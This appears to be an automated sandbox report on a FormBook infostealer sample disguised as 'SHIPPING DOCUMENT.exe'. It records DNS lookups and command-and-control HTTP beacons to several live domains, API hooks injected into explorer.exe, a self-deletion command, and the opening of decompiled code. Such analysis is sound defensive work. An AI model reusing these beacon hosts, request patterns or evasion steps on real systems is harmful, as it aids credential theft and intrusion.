                                          May 4, 2021 20:10:43.098949909 CEST53566218.8.8.8192.168.2.4
                                          May 4, 2021 20:10:44.497061014 CEST6311653192.168.2.48.8.8.8
                                          May 4, 2021 20:10:44.547878027 CEST53631168.8.8.8192.168.2.4
                                          May 4, 2021 20:10:45.598361969 CEST6407853192.168.2.48.8.8.8
                                          May 4, 2021 20:10:45.648258924 CEST53640788.8.8.8192.168.2.4
                                          May 4, 2021 20:10:46.404876947 CEST6480153192.168.2.48.8.8.8
                                          May 4, 2021 20:10:46.464987993 CEST53648018.8.8.8192.168.2.4
                                          May 4, 2021 20:11:02.089152098 CEST6172153192.168.2.48.8.8.8
                                          May 4, 2021 20:11:02.141515970 CEST53617218.8.8.8192.168.2.4
                                          May 4, 2021 20:11:12.937578917 CEST5125553192.168.2.48.8.8.8
                                          May 4, 2021 20:11:13.000139952 CEST53512558.8.8.8192.168.2.4
                                          May 4, 2021 20:11:17.360085011 CEST6152253192.168.2.48.8.8.8
                                          May 4, 2021 20:11:17.419871092 CEST53615228.8.8.8192.168.2.4
                                          May 4, 2021 20:11:29.710856915 CEST5233753192.168.2.48.8.8.8
                                          May 4, 2021 20:11:29.845668077 CEST53523378.8.8.8192.168.2.4
                                          May 4, 2021 20:11:30.667967081 CEST5504653192.168.2.48.8.8.8
                                          May 4, 2021 20:11:30.773550034 CEST53550468.8.8.8192.168.2.4
                                          May 4, 2021 20:11:31.398775101 CEST4961253192.168.2.48.8.8.8
                                          May 4, 2021 20:11:31.468777895 CEST53496128.8.8.8192.168.2.4
                                          May 4, 2021 20:11:31.779844999 CEST4928553192.168.2.48.8.8.8
                                          May 4, 2021 20:11:31.832775116 CEST53492858.8.8.8192.168.2.4
                                          May 4, 2021 20:11:31.926997900 CEST5060153192.168.2.48.8.8.8
                                          May 4, 2021 20:11:31.987099886 CEST53506018.8.8.8192.168.2.4
                                          May 4, 2021 20:11:32.563543081 CEST6087553192.168.2.48.8.8.8
                                          May 4, 2021 20:11:32.625091076 CEST53608758.8.8.8192.168.2.4
                                          May 4, 2021 20:11:33.563436031 CEST5644853192.168.2.48.8.8.8
                                          May 4, 2021 20:11:33.626952887 CEST53564488.8.8.8192.168.2.4
                                          May 4, 2021 20:11:34.135477066 CEST5917253192.168.2.48.8.8.8
                                          May 4, 2021 20:11:34.193928957 CEST53591728.8.8.8192.168.2.4
                                          May 4, 2021 20:11:35.226448059 CEST6242053192.168.2.48.8.8.8
                                          May 4, 2021 20:11:35.283691883 CEST53624208.8.8.8192.168.2.4
                                          May 4, 2021 20:11:36.049501896 CEST6057953192.168.2.48.8.8.8
                                          May 4, 2021 20:11:36.224613905 CEST5018353192.168.2.48.8.8.8
                                          May 4, 2021 20:11:36.424552917 CEST53605798.8.8.8192.168.2.4
                                          May 4, 2021 20:11:36.503490925 CEST53501838.8.8.8192.168.2.4
                                          May 4, 2021 20:11:37.042174101 CEST6153153192.168.2.48.8.8.8
                                          May 4, 2021 20:11:37.105658054 CEST53615318.8.8.8192.168.2.4
                                          May 4, 2021 20:11:40.637680054 CEST4922853192.168.2.48.8.8.8
                                          May 4, 2021 20:11:40.696042061 CEST53492288.8.8.8192.168.2.4
                                          May 4, 2021 20:11:56.263324976 CEST5979453192.168.2.48.8.8.8
                                          May 4, 2021 20:11:56.324739933 CEST53597948.8.8.8192.168.2.4
                                          May 4, 2021 20:12:11.693784952 CEST5591653192.168.2.48.8.8.8
                                          May 4, 2021 20:12:11.742496014 CEST53559168.8.8.8192.168.2.4
                                          May 4, 2021 20:12:13.384565115 CEST5275253192.168.2.48.8.8.8
                                          May 4, 2021 20:12:13.452053070 CEST53527528.8.8.8192.168.2.4
                                          May 4, 2021 20:12:16.698889017 CEST6054253192.168.2.48.8.8.8
                                          May 4, 2021 20:12:16.768903971 CEST53605428.8.8.8192.168.2.4
                                          May 4, 2021 20:12:37.072877884 CEST6068953192.168.2.48.8.8.8
                                          May 4, 2021 20:12:37.284445047 CEST53606898.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          May 4, 2021 20:11:36.049501896 CEST192.168.2.48.8.8.80x7501Standard query (0)www.barkinlot.comA (IP address)IN (0x0001)
                                          May 4, 2021 20:11:56.263324976 CEST192.168.2.48.8.8.80xd8c7Standard query (0)www.buyruon.comA (IP address)IN (0x0001)
                                          May 4, 2021 20:12:16.698889017 CEST192.168.2.48.8.8.80xfab8Standard query (0)www.fuerzaagavera.comA (IP address)IN (0x0001)
                                          May 4, 2021 20:12:37.072877884 CEST192.168.2.48.8.8.80xce44Standard query (0)www.union-green.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          May 4, 2021 20:11:36.424552917 CEST8.8.8.8192.168.2.40x7501No error (0)www.barkinlot.com107.151.79.234A (IP address)IN (0x0001)
                                          May 4, 2021 20:11:56.324739933 CEST8.8.8.8192.168.2.40xd8c7No error (0)www.buyruon.combuyruon.comCNAME (Canonical name)IN (0x0001)
                                          May 4, 2021 20:11:56.324739933 CEST8.8.8.8192.168.2.40xd8c7No error (0)buyruon.com34.102.136.180A (IP address)IN (0x0001)
                                          May 4, 2021 20:12:16.768903971 CEST8.8.8.8192.168.2.40xfab8No error (0)www.fuerzaagavera.com64.190.62.111A (IP address)IN (0x0001)
                                          May 4, 2021 20:12:37.284445047 CEST8.8.8.8192.168.2.40xce44No error (0)www.union-green.com154.220.41.208A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.barkinlot.com
                                          • www.buyruon.com
                                          • www.fuerzaagavera.com
                                          • www.union-green.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.449754107.151.79.23480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:11:36.722306013 CEST2080OUTGET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.barkinlot.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:11:37.016350031 CEST2123INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 04 May 2021 18:11:41 GMT
                                          Content-Type: text/html
                                          Content-Length: 4372
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 47 42 4b 22 3e 0d 0a 3c 74 69 74 6c 65 3e b9 fa 7c bc ca 7c b2 a9 7c b2 ca 7c bc e0 7c b6 bd 7c ce af 7c d4 b1 7c bb e1 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 73 74 79 6c 65 3e 2e 69 65 38 20 2e 61 6c 65 72 74 2d 63 69 72 63 6c 65 2c 2e 69 65 38 20 2e 61 6c 65 72 74 2d 66 6f 6f 74 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 69 65 38 20 2e 61 6c 65 72 74 2d 62 6f 78 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 37 35 70 78 7d 2e 69 65 38 20 2e 61 6c 65 72 74 2d 73 65 63 2d 74 65 78 74 7b 74 6f 70 3a 34 35 70 78 7d 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 36 45 41 45 42 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 27 ce a2 c8 ed d1 c5 ba da 27 2c 27 cb ce cc e5 27 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 61 6c 65 72 74 2d 62 6f 78 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 39 36 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 31 38 30 70 78 20 38 35 70 78 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 20 31 30 70 78 20 30 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 35 70 78 20 39 70 78 20 31 37 70 78 20 72 67 62 61 28 31 30 32 2c 31 30 32 2c 31 30 32 2c 30 2e 37 35 29 3b 77 69 64 74 68 3a 32 38 36 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 61 6c 65 72 74 2d 62 6f 78 20 70 7b 6d 61 72 67 69 6e 3a 30 7d 2e 61 6c 65 72 74 2d 63 69 72 63 6c 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 35 30 70 78 3b 6c 65 66 74 3a 31 31 31 70 78 7d 2e 61 6c 65 72 74 2d 73 65 63 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 37 33 35 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 20 31 73 20 6c 69 6e 65 61 72 7d 2e 61 6c 65 72 74 2d 73 65 63 2d 74 65 78 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 31 70 78 3b 6c 65 66 74 3a 31 39 30 70 78 3b 77 69 64 74 68 3a 37 36 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 38 70 78 7d 2e 61 6c 65 72 74 2d 73 65 63 2d 75 6e 69 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 7d 2e 61 6c 65 72 74 2d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 33 35 70 78 20 30 7d 2e 61 6c 65 72 74 2d 68 65 61 64 7b 63 6f 6c 6f 72 3a 23 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 7d 2e 61 6c 65 72 74 2d 63 6f 6e 63 65 6e 74 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 30 20 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 37 42 37 42 37 42 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 61 6c 65 72 74 2d 63 6f 6e 63 65 6e 74 20 70 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 41 42 30 46 37 3b 68 65 69 67 68 74 3a 35 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 35 70 78 3b 77 69 64 74 68 3a 32 38 36 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74
                                          Data Ascii: <!DOCTYPE html><html><head><meta charset="GBK"><title>||||||||</title>...[if IE 8]><style>.ie8 .alert-circle,.ie8 .alert-footer{display:none}.ie8 .alert-box{padding-top:75px}.ie8 .alert-sec-text{top:45px}</style><![endif]--><style>body{margin:0;padding:0;background:#E6EAEB;font-family:Arial,'','',sans-serif}.alert-box{display:none;position:relative;margin:96px auto 0;padding:180px 85px 22px;border-radius:10px 10px 0 0;background:#FFF;box-shadow:5px 9px 17px rgba(102,102,102,0.75);width:286px;color:#FFF;text-align:center}.alert-box p{margin:0}.alert-circle{position:absolute;top:-50px;left:111px}.alert-sec-circle{stroke-dashoffset:0;stroke-dasharray:735;transition:stroke-dashoffset 1s linear}.alert-sec-text{position:absolute;top:11px;left:190px;width:76px;color:#000;font-size:68px}.alert-sec-unit{font-size:34px}.alert-body{margin:35px 0}.alert-head{color:#242424;font-size:28px}.alert-concent{margin:25px 0 14px;color:#7B7B7B;font-size:18px}.alert-concent p{line-height:27px}.alert-btn{display:block;border-radius:10px;background-color:#4AB0F7;height:55px;line-height:55px;width:286px;color:#FFF;font-size:20px;text-decorat
                                          May 4, 2021 20:11:37.016379118 CEST2124INData Raw: 69 6f 6e 3a 6e 6f 6e 65 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 32 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 42 43 32 46 46 7d 2e 61 6c 65 72 74 2d 66 6f 6f 74 65
                                          Data Ascii: ion:none;letter-spacing:2px}.alert-btn:hover{background-color:#6BC2FF}.alert-footer{margin:0 auto;height:42px;width:120px}.alert-footer-icon{float:left}.alert-footer-text{float:left;border-left:2px solid #EEE;padding:3px 0 0 5px;height:40px;co
                                          May 4, 2021 20:11:37.016396999 CEST2126INData Raw: 65 72 74 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 2d 62 74 6e 22 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 6f 74 6f 6c 69 6e 6b 73 28 29 3b 22 3e c1 a2 bc b4 bd f8
                                          Data Ascii: ert-btn" class="alert-btn" href="javascript:void(0)" onclick="gotolinks();"></a></div> <div class="alert-footer clearfix"> <svg width="46px" height="42px" class="alert-footer-icon"> <circle fill-rule="evenodd" clip-rule="even
                                          May 4, 2021 20:11:37.016410112 CEST2126INData Raw: 4c 20 3d 20 65 3b 0d 0a 09 76 61 72 20 74 20 3d 20 35 2c 0d 0a 09 09 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6a 73 2d 73 65 63 2d 63 69 72 63 6c 65 22 29 3b 0d 0a 09 64 6f 63 75 6d 65 6e 74 2e 67 65
                                          Data Ascii: L = e;var t = 5,n = document.getElementById("js-sec-circle");document.getElementById("js-sec-text").innerHTML = t, si = setInterval(function() {if (0 == t) {clearInterval(si);location.href = a[m]} else {t -= 1,


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44976234.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:11:56.367537022 CEST6379OUTGET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.buyruon.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:11:56.504621983 CEST6380INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Tue, 04 May 2021 18:11:56 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6089be8c-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.44976564.190.62.11180C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:12:16.816143990 CEST6409OUTGET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.fuerzaagavera.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:12:16.892096996 CEST6410INHTTP/1.1 302 Found
                                          date: Tue, 04 May 2021 18:12:16 GMT
                                          content-type: text/html; charset=UTF-8
                                          content-length: 0
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EROzPbOnbfRvUmSbAOkEUwJ7s553pIun9G63+qZ5vnIypGjvdj+l8kui4EOI3lWVG2yScLUXKcmIyMA5hPxUDw==
                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          pragma: no-cache
                                          last-modified: Tue, 04 May 2021 18:12:16 GMT
                                          location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                          x-cache-miss-from: parking-5cc4cbb56f-gtxcr
                                          server: NginX
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.449766154.220.41.20880C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:12:37.590909004 CEST6412OUTGET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.union-green.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:12:37.898349047 CEST6412INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 04 May 2021 18:12:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 1.0


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE6
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE6
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE6
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE6

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: SHIPPING DOCUMENT.exe PID: 7060 Parent PID: 6000

                                          General

                                          Start time:20:10:33
                                          Start date:04/05/2021
                                          Path:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x400000
                                          File size:233957 bytes
                                          MD5 hash:25E847B9631BC2FE8D87FE4278FA142E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: SHIPPING DOCUMENT.exe PID: 7088 Parent PID: 7060

                                          General

                                          Start time:20:10:34
                                          Start date:04/05/2021
                                          Path:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x400000
                                          File size:233957 bytes
                                          MD5 hash:25E847B9631BC2FE8D87FE4278FA142E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 7088

                                          General

                                          Start time:20:10:39
                                          Start date:04/05/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: autofmt.exe PID: 5756 Parent PID: 3424

                                          General

                                          Start time:20:10:54
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\autofmt.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\SysWOW64\autofmt.exe
                                          Imagebase:0x8e0000
                                          File size:831488 bytes
                                          MD5 hash:7FC345F685C2A58283872D851316ACC4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: NETSTAT.EXE PID: 5752 Parent PID: 3424

                                          General

                                          Start time:20:10:54
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Imagebase:0xd60000
                                          File size:32768 bytes
                                          MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 6948 Parent PID: 5752

                                          General

                                          Start time:20:10:58
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 6664 Parent PID: 6948

                                          General

                                          Start time:20:10:58
                                          Start date:04/05/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: SHIPPING DOCUMENT.exe PID: 7060 Parent PID: 6000 SHIPPING DOCUMENT.exeCOMMON

                                            Executed Functions

                                            Function 00403461, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
